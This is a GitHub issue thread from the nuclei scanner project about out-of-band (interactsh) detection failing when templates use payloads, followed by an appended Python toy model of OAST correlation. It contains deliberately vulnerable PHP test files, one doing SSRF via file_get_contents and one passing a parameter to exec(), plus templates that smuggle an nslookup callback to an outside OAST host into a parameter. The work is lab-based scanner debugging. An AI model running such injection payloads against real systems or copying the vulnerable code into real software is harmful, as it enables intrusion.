projectdiscovery / nuclei

Fast and customizable vulnerability scanner based on simple YAML based DSL.
https://docs.projectdiscovery.io/tools/nuclei
MIT License

Using payloads will cause interactsh to fail #5485

Open pwnhxl opened 1 month ago

pwnhxl commented 1 month ago

Nuclei version:

latest

--

When I use payloads together with OAST, it results in a miss. Here's an example of the test command I used, along with the YAML templates and a PHP test.

Nuclei command:


PS C:\> nuclei -t .\ssrf*.yaml -vv -id ssrf-1,ssrf-2 -u http://192.168.0.102/

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.0

                projectdiscovery.io

[WRN] Found 30 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.3.0 (latest)
[INF] Current nuclei-templates version: v9.9.2 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 67
[INF] Templates loaded for current scan: 2
[WRN] Loading 2 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[ssrf-1] SSRF (@projectdiscoveryai) [high]
[ssrf-2] SSRF (@projectdiscoveryai) [high]
[INF] Using Interactsh Server: oast.live
[ssrf-2] [http] [high] http://192.168.0.102/?url=http://cqnh1md5p36thd453060jstmphscsnj93.oast.live
PS C:\>

index.php
<?php
if (isset($_GET['url'])) {
    $fileContent = file_get_contents($_GET['url']);
    echo $fileContent;
}
?>

ssrf-1.yaml

id: ssrf-1

info:
  name: SSRF
  author: ProjectDiscoveryAI
  severity: high
  description: |
    This template detects Server Side Request Forgery (SSRF) vulnerabilities where the input parameter is base64 encoded.

http:
  - raw:
      # - |
      #   GET /?password={{password}}&data={{base64("http://{{interactsh-url}}")}} HTTP/1.1
      #   Host: {{Hostname}}

      # - |
      #   GET /?url=http://{{interactsh-url}} HTTP/1.1
      #   Host: {{Hostname}}

      - |
        GET /?password={{password}}&url=http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      password:
        - admin
        - aaaaa
        - bbbbb

    stop-at-first-match: true
    matchers:
      - type: word
        part: interactsh_protocol  # matches when a DNS interaction was received
        words:
          - "dns"

id: ssrf-2

info:
  name: SSRF
  author: ProjectDiscoveryAI
  severity: high
  description: |
    This template detects Server Side Request Forgery (SSRF) vulnerabilities where the input parameter is base64 encoded.

http:
  - raw:
      # - |
      #   GET /?password={{password}}&data={{base64("http://{{interactsh-url}}")}} HTTP/1.1
      #   Host: {{Hostname}}

      # - |
      #   GET /?url=http://{{interactsh-url}} HTTP/1.1
      #   Host: {{Hostname}}

      - |
        GET /?url=http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

    # payloads:
    #   password:
    #     - admin
    #     - aaaaa
    #     - bbbbb

    stop-at-first-match: true
    matchers:
      - type: word
        part: interactsh_protocol  # matches when a DNS interaction was received
        words:
          - "dns"

pwnhxl commented 1 month ago

Both ssrf-1.yaml and ssrf-2.yaml send url=http://{{interactsh-url}} but ssrf-1.yaml fails to detect because ssrf-1.yaml uses a payload.

pwnhxl commented 1 month ago

@tarunKoyalwar

dwisiswant0 commented 1 month ago

Confirmed.

k1rnt commented 2 weeks ago

I am also experiencing the same issue. I will leave the logs below, and I hope they might be helpful.

nuclei version

v3.3.1

test

vuln environment start

vuln.php

<?php
# vuln.php
$command = (!isset($_GET['command']) || $_GET['command'] === '')
    ? 'ls'
    : $_GET['command'];
exec($command);
?>

start vuln.php

php -S 0.0.0.0:8888 ./vuln.php

detect nuclei template log

detect.yaml

# detect.yaml
id: detect

info:
  name: OOB OS Command injection
  author: k1rnt
  severity: High
  description: A template for detecting OS command injection using Out-of-Band (OOB) techniques.

http:
  - raw:
    - |
        GET /?command=nslookup${IFS}{{interactsh-url}} HTTP/1.1
    matchers:
      - name: A DNS request was sent to an external URL.
        type: word
        part: interactsh_protocol
        words:
          - "dns"

Execution command

nuclei -t ./detect.yaml -u "http://localhost:8888" -p "http://localhost:8080" --debug

Execution result

nuclei -t ./detect.yaml -u "http://localhost:8888" -p "http://localhost:8080" --debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.1

                projectdiscovery.io

[INF] Current nuclei version: v3.3.1 (latest)
[INF] Current nuclei-templates version: v9.9.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 56
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.live
[INF] [detect] Dumped HTTP request for http://localhost:8888/?command=nslookup${IFS}cr63feqhc8a54hnmtj306rb8uy4cqkiw7.oast.live

GET /?command=nslookup${IFS}cr63feqhc8a54hnmtj306rb8uy4cqkiw7.oast.live HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/618.6 (KHTML, like Gecko) Version/17.2 Safari/618.6
Connection: close
Accept-Encoding: gzip

[DBG] [detect] Dumped HTTP response http://localhost:8888/?command=nslookup${IFS}cr63feqhc8a54hnmtj306rb8uy4cqkiw7.oast.live

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Mon, 26 Aug 2024 08:07:24 GMT
Host: localhost:8888
X-Powered-By: PHP/8.3.10

[cr63feqhc8a54hnmtj306rb8uy4cqkiw7] Received DNS interaction from 163.139.8.231 at 2024-08-26 08:07:28
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 16796
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version 0; flags:; udp: 1232

;; QUESTION SECTION:
;cr63feqhc8a54hnmtj306rb8uy4cqkiw7.oast.live.   IN       A

------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 16796
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;cr63feqhc8a54hnmtj306rb8uy4cqkiw7.oast.live.   IN       A

;; ANSWER SECTION:
cr63feqhc8a54hnmtj306rb8uy4cqkiw7.oast.live.    3600    IN      A       178.128.210.172

;; AUTHORITY SECTION:
cr63feqhc8a54hnmtj306rb8uy4cqkiw7.oast.live.    3600    IN      NS      ns1.oast.live.
cr63feqhc8a54hnmtj306rb8uy4cqkiw7.oast.live.    3600    IN      NS      ns2.oast.live.

;; ADDITIONAL SECTION:
ns1.oast.live.  3600    IN      A       178.128.210.172
ns2.oast.live.  3600    IN      A       178.128.210.172

[detect:A DNS request was sent to an external URL.] [http] [high] http://localhost:8888/?command=nslookup${IFS}cr63feqhc8a54hnmtj306rb8uy4cqkiw7.oast.live

burp screenshot: (image not included; Burp shows the request with the resolved oast.live hostname)

no detect nuclei template log

no_detect.yaml

# no_detect.yaml
id: no_detect

info:
  name: OOB OS Command injection
  author: k1rnt
  severity: High
  description: A template for detecting OS command injection using Out-of-Band (OOB) techniques.

http:
  - raw:
    - |
        GET /?command=§pattern§ HTTP/1.1
    payloads:
      pattern:
        - "nslookup${IFS}.{{interactsh-url}}"
    matchers:
      - name: A DNS request was sent to an external URL.
        type: word
        part: interactsh_protocol
        words:
          - "dns"

Execution command

nuclei -t ./no_detect.yaml -u "http://localhost:8888" -p "http://localhost:8080" --debug

Execution result

nuclei -t ./no_detect.yaml -u "http://localhost:8888" -p "http://localhost:8080" --debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.1

                projectdiscovery.io

[INF] Current nuclei version: v3.3.1 (latest)
[INF] Current nuclei-templates version: v9.9.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 56
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.site
[INF] [no_detect] Dumped HTTP request for http://localhost:8888/?command=nslookup${IFS}.cr63gfihc8a56pe5fkr039xjexhqa7jgb.oast.site

GET /?command=nslookup${IFS}.cr63gfihc8a56pe5fkr039xjexhqa7jgb.oast.site HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept-Encoding: gzip

[DBG] [no_detect] Dumped HTTP response http://localhost:8888/?command=nslookup${IFS}.cr63gfihc8a56pe5fkr039xjexhqa7jgb.oast.site

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Mon, 26 Aug 2024 08:09:35 GMT
Host: localhost:8888
X-Powered-By: PHP/8.3.10

[INF] No results found. Better luck next time!

burp screenshot: (image not included; Burp shows the request with the resolved oast.site hostname)
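Both reports above come down to the same invariant: for a `part: interactsh_protocol` matcher to fire, every request that nuclei actually sends must carry an OAST hostname that the scanner can later trace back to that request, regardless of whether the request was produced once (ssrf-2, detect) or once per payload value (ssrf-1), and regardless of whether `{{interactsh-url}}` appears in the raw request or inside a payload value (no_detect). The following is an added example written for this thread, not nuclei's or interactsh's code: a toy model of payload expansion and interaction correlation that shows what that invariant looks like when it holds. The domain `oast.example`, the id layout (a 20-character session prefix followed by a 13-character per-request nonce) and all function names are assumptions made for the illustration.

```python
# Added example for this thread, not nuclei's code: a toy model of payload
# expansion and OAST correlation, showing what has to hold for a matcher on
# `interactsh_protocol` to fire. The OAST domain and the id layout (20-char
# session prefix + 13-char nonce) are assumptions for the illustration.
import itertools
import re
import secrets
import string

OAST_DOMAIN = "oast.example"      # assumption: stand-in for oast.live / oast.site
CORRELATION_ID_LEN = 20           # assumption: session id is the first 20 chars of the label
NONCE_LEN = 13                    # assumption: remaining chars are per-request randomness
ALPHABET = string.ascii_lowercase + string.digits

# {{name}} placeholders and Burp-style §name§ markers (as in no_detect.yaml)
PLACEHOLDER = re.compile(r"\{\{([A-Za-z0-9_-]+)\}\}|§([A-Za-z0-9_-]+)§")


def new_correlation_id():
    return "".join(secrets.choice(ALPHABET) for _ in range(CORRELATION_ID_LEN))


def new_oast_hostname(correlation_id):
    nonce = "".join(secrets.choice(ALPHABET) for _ in range(NONCE_LEN))
    return f"{correlation_id}{nonce}.{OAST_DOMAIN}"


def substitute(text, values):
    """Replace known placeholders; unknown ones such as {{Hostname}} are left untouched."""
    def repl(match):
        name = match.group(1) or match.group(2)
        return values.get(name, match.group(0))
    return PLACEHOLDER.sub(repl, text)


def expand_requests(raw, payloads, correlation_id):
    """One (request_text, payload_values, oast_hostname) triple per payload combination.

    Payload variables are substituted first and {{interactsh-url}} last, so the
    placeholder resolves even when it sits inside a payload value, and every
    request carries its own hostname that can be traced back to it.
    """
    names = list(payloads)
    combos = itertools.product(*(payloads[n] for n in names)) if names else [()]
    expanded = []
    for combo in combos:
        values = dict(zip(names, combo))
        hostname = new_oast_hostname(correlation_id)
        text = substitute(raw, values)                          # pass 1: payloads
        text = substitute(text, {"interactsh-url": hostname})   # pass 2: OAST URL
        expanded.append((text, values, hostname))
    return expanded


def correlate(expanded, interactions, correlation_id,
              wanted_protocol="dns", stop_at_first_match=True):
    """Map (hostname, protocol) interactions back to the requests that caused them.

    Toy equivalent of a `part: interactsh_protocol` word matcher: a request is
    a hit when an interaction for its own hostname arrived over the wanted
    protocol. Labels that do not start with our correlation id belong to
    another session and are ignored.
    """
    by_hostname = {hostname: values for _, values, hostname in expanded}
    hits = []
    for hostname, protocol in interactions:
        label = hostname.split(".", 1)[0]
        if not label.startswith(correlation_id):
            continue
        if hostname in by_hostname and protocol == wanted_protocol:
            hits.append((by_hostname[hostname], hostname))
            if stop_at_first_match:
                break
    return hits


if __name__ == "__main__":
    cid = new_correlation_id()
    raw = ("GET /?password={{password}}&url=http://{{interactsh-url}} HTTP/1.1\n"
           "Host: {{Hostname}}")
    expanded = expand_requests(raw, {"password": ["admin", "aaaaa", "bbbbb"]}, cid)
    for text, values, hostname in expanded:
        print(values, "->", hostname)
    # constructed interaction: the second request's hostname was resolved over DNS
    interactions = [(expanded[1][2], "dns")]
    print("hits:", correlate(expanded, interactions, cid))
```

The point of the two-pass substitution is the no_detect.yaml case: if `{{interactsh-url}}` is only resolved in the raw request text and not in the values that payload iteration injects, the request goes out with a hostname the correlation table never saw, and an incoming DNS interaction for it is discarded; seen from outside that is exactly a request that visibly hits the target (the Burp capture) followed by "No results found". The toy only states the invariant; it does not show where in nuclei the hostname is lost for templates that use `payloads`.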